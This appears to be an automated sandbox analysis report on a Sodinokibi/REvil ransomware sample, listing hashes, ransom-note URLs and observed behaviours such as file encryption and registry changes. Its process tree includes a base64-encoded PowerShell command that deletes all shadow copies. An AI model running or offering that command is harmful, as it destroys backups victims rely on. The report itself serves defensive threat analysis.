Analysis
-
max time kernel
141s -
max time network
114s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
20-08-2020 13:02
Static task
static1
Behavioral task
behavioral1
Sample
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Resource
win7v200722
Behavioral task
behavioral2
Sample
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Resource
win10
General
-
Target
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
-
Size
116KB
-
MD5
f9d060c4e1ef8bcda341ea2f490af006
-
SHA1
549f4014aec9e52cd8a4a1b304561c00278063a3
-
SHA256
09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499
-
SHA512
57dacb3a98f429492381aaf2693ea4fc399d948c0a7dc6a9b3a45eed8474f3f0c8d84964834fd3f44f74b320d24a505b4255555f68c115ff553559493942fd87
Malware Config
Extracted
C:\j919vw3-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D492A3C5F9F24AC9
http://decryptor.cc/D492A3C5F9F24AC9
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 138 IoCs
Processes:
rundll32.exeflow pid process 2 996 rundll32.exe 4 996 rundll32.exe 6 996 rundll32.exe 8 996 rundll32.exe 10 996 rundll32.exe 12 996 rundll32.exe 14 996 rundll32.exe 16 996 rundll32.exe 20 996 rundll32.exe 21 996 rundll32.exe 23 996 rundll32.exe 24 996 rundll32.exe 26 996 rundll32.exe 28 996 rundll32.exe 29 996 rundll32.exe 31 996 rundll32.exe 33 996 rundll32.exe 35 996 rundll32.exe 36 996 rundll32.exe 38 996 rundll32.exe 39 996 rundll32.exe 42 996 rundll32.exe 44 996 rundll32.exe 46 996 rundll32.exe 48 996 rundll32.exe 49 996 rundll32.exe 51 996 rundll32.exe 53 996 rundll32.exe 54 996 rundll32.exe 56 996 rundll32.exe 57 996 rundll32.exe 59 996 rundll32.exe 60 996 rundll32.exe 62 996 rundll32.exe 64 996 rundll32.exe 66 996 rundll32.exe 67 996 rundll32.exe 69 996 rundll32.exe 71 996 rundll32.exe 73 996 rundll32.exe 75 996 rundll32.exe 76 996 rundll32.exe 80 996 rundll32.exe 81 996 rundll32.exe 83 996 rundll32.exe 84 996 rundll32.exe 86 996 rundll32.exe 87 996 rundll32.exe 89 996 rundll32.exe 90 996 rundll32.exe 92 996 rundll32.exe 94 996 rundll32.exe 95 996 rundll32.exe 97 996 rundll32.exe 99 996 rundll32.exe 100 996 rundll32.exe 102 996 rundll32.exe 103 996 rundll32.exe 105 996 rundll32.exe 108 996 rundll32.exe 109 996 rundll32.exe 111 996 rundll32.exe 113 996 rundll32.exe 115 996 rundll32.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
rundll32.exedescription ioc process File renamed C:\Users\Admin\Pictures\LockBackup.raw => \??\c:\users\admin\pictures\LockBackup.raw.j919vw3 rundll32.exe File renamed C:\Users\Admin\Pictures\JoinDebug.crw => \??\c:\users\admin\pictures\JoinDebug.crw.j919vw3 rundll32.exe -
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt rundll32.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\050l3.bmp" rundll32.exe -
Drops file in Program Files directory 28 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification \??\c:\program files\DisableRestart.clr rundll32.exe File opened for modification \??\c:\program files\RevokeInstall.xht rundll32.exe File opened for modification \??\c:\program files\SkipUninstall.DVR rundll32.exe File opened for modification \??\c:\program files\DismountClear.001 rundll32.exe File opened for modification \??\c:\program files\PopRestore.aif rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\j919vw3-readme.txt rundll32.exe File opened for modification \??\c:\program files\PopSubmit.easmx rundll32.exe File opened for modification \??\c:\program files\StartImport.xla rundll32.exe File opened for modification \??\c:\program files\WriteReceive.zip rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\j919vw3-readme.txt rundll32.exe File opened for modification \??\c:\program files\CompressStep.search-ms rundll32.exe File opened for modification \??\c:\program files\ExportConvertFrom.mpeg2 rundll32.exe File opened for modification \??\c:\program files\GrantConvertTo.nfo rundll32.exe File opened for modification \??\c:\program files\RequestRead.fon rundll32.exe File opened for modification \??\c:\program files\StepGroup.avi rundll32.exe File opened for modification \??\c:\program files\UnprotectRepair.sql rundll32.exe File created \??\c:\program files\j919vw3-readme.txt rundll32.exe File opened for modification \??\c:\program files\DismountRestart.wdp rundll32.exe File opened for modification \??\c:\program files\GroupInvoke.mpeg rundll32.exe File created \??\c:\program files\microsoft sql server compact edition\j919vw3-readme.txt rundll32.exe File opened for modification \??\c:\program files\ReceiveResolve.wma rundll32.exe File opened for modification \??\c:\program files\ConvertFromMeasure.midi rundll32.exe File opened for modification \??\c:\program files\EditCheckpoint.emf rundll32.exe File opened for modification \??\c:\program files\FormatInitialize.cr2 rundll32.exe File created \??\c:\program files (x86)\j919vw3-readme.txt rundll32.exe File opened for modification \??\c:\program files\PublishSelect.scf rundll32.exe File opened for modification \??\c:\program files\ResolveWatch.mpeg rundll32.exe File opened for modification \??\c:\program files\SendExport.mht rundll32.exe -
Processes:
rundll32.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\36B12B49F9819ED74C9EBC380FC6568F5DACB2F7\Blob = 040000000100000010000000f1bc636a54e0b527f5cde71ae34d6e4a0f00000001000000140000009a680178cfa26912ab0dfa84d27d892aa0235881190000000100000010000000a2049dcd69cd217792d9b30d5291298503000000010000001400000036b12b49f9819ed74c9ebc380fc6568f5dacb2f71d0000000100000010000000446b89a35bbf3713f943e2826b1847ee140000000100000014000000a073499968dc855b65e39b282f579fbd33bc074853000000010000002400000030223020060a2a83088c9b1b6485510130123010060a2b0601040182373c0101030200c00b00000001000000360000005300450043004f004d002000540072007500730074002000530079007300740065006d007300200043004f0020004c0054004400000009000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b0601050507030920000000010000005e0300003082035a30820242a003020102020100300d06092a864886f70d01010505003050310b3009060355040613024a5031183016060355040a130f5345434f4d2054727573742e6e657431273025060355040b131e536563757269747920436f6d6d756e69636174696f6e20526f6f74434131301e170d3033303933303034323034395a170d3233303933303034323034395a3050310b3009060355040613024a5031183016060355040a130f5345434f4d2054727573742e6e657431273025060355040b131e536563757269747920436f6d6d756e69636174696f6e20526f6f7443413130820122300d06092a864886f70d01010105000382010f003082010a0282010100b3b3fe7fd36db1ef167c57a50c6d768a2f4bbf64fb4cee8af0f3297cf5ffee2ae0e9e9ba5b64229a9a6f2c3a266951059926dcd51c6a71c69a7d1e9ddd7c6cc68c67674a3ef871b01927a9090ca695bf4b8c0cfa55983bd8e822a14b713879ac979269b3897eea21680698149687d26136bc6d27569e57eec0c056fd32cfa4d98ec223d78da8f3d825ac97e47038f4b63ab49d3b972643a3a1bc4959724c2330870158f64ebe1c685666afcd415dc8b34d2a5546ab1fda1ee2403ddbcd7db992809c37dd0c96649ddc22f7648bdf61de15945215a07d52c94ba821c9c6b1edcbc39560d10ff0ab70f8dfcb4d7eecd6faabd9bd7f54f2a5e979fad9d6762428730203010001a33f303d301d0603551d0e04160414a073499968dc855b65e39b282f579fbd33bc0748300b0603551d0f040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d010105050003820101006840a9a8bbe44f5d79b305b517b36013ebc6925de0d1d36afefbbe9b6dbfc7056d5920c41cf0b7da84580263fa4816ef4fa50bf74a98f23f9e1bad476b63ce0847eb523f789caf4daef8d54fcf9a982a10413952c4ddd99b0eef9301aeb22eca684224426cb0b33a3ecde9da48c415cbe9f9070f9250498add31975fc9e937aa3b5965979432c9b39f3e3a6258c549ad620e71a532aa2fc6897643401313673da2542510cbf13af2d9fadb4956bba6fea74135c3e08861c988c7df3610229859eab04afb5616736eac4df722a14fad1d7a2d4527e530c15ef2da13cb2542519547038c6c21cc7442ed53ff338b8f0f5701162fcfa6eec9702214bdfdbe6c0b03 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
rundll32.exepowershell.exepid process 996 rundll32.exe 1020 powershell.exe 1020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 996 rundll32.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeBackupPrivilege 1904 vssvc.exe Token: SeRestorePrivilege 1904 vssvc.exe Token: SeAuditPrivilege 1904 vssvc.exe Token: SeTakeOwnershipPrivilege 996 rundll32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 1000 wrote to memory of 996 1000 rundll32.exe rundll32.exe PID 996 wrote to memory of 1020 996 rundll32.exe powershell.exe PID 996 wrote to memory of 1020 996 rundll32.exe powershell.exe PID 996 wrote to memory of 1020 996 rundll32.exe powershell.exe PID 996 wrote to memory of 1020 996 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#12⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1656
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1904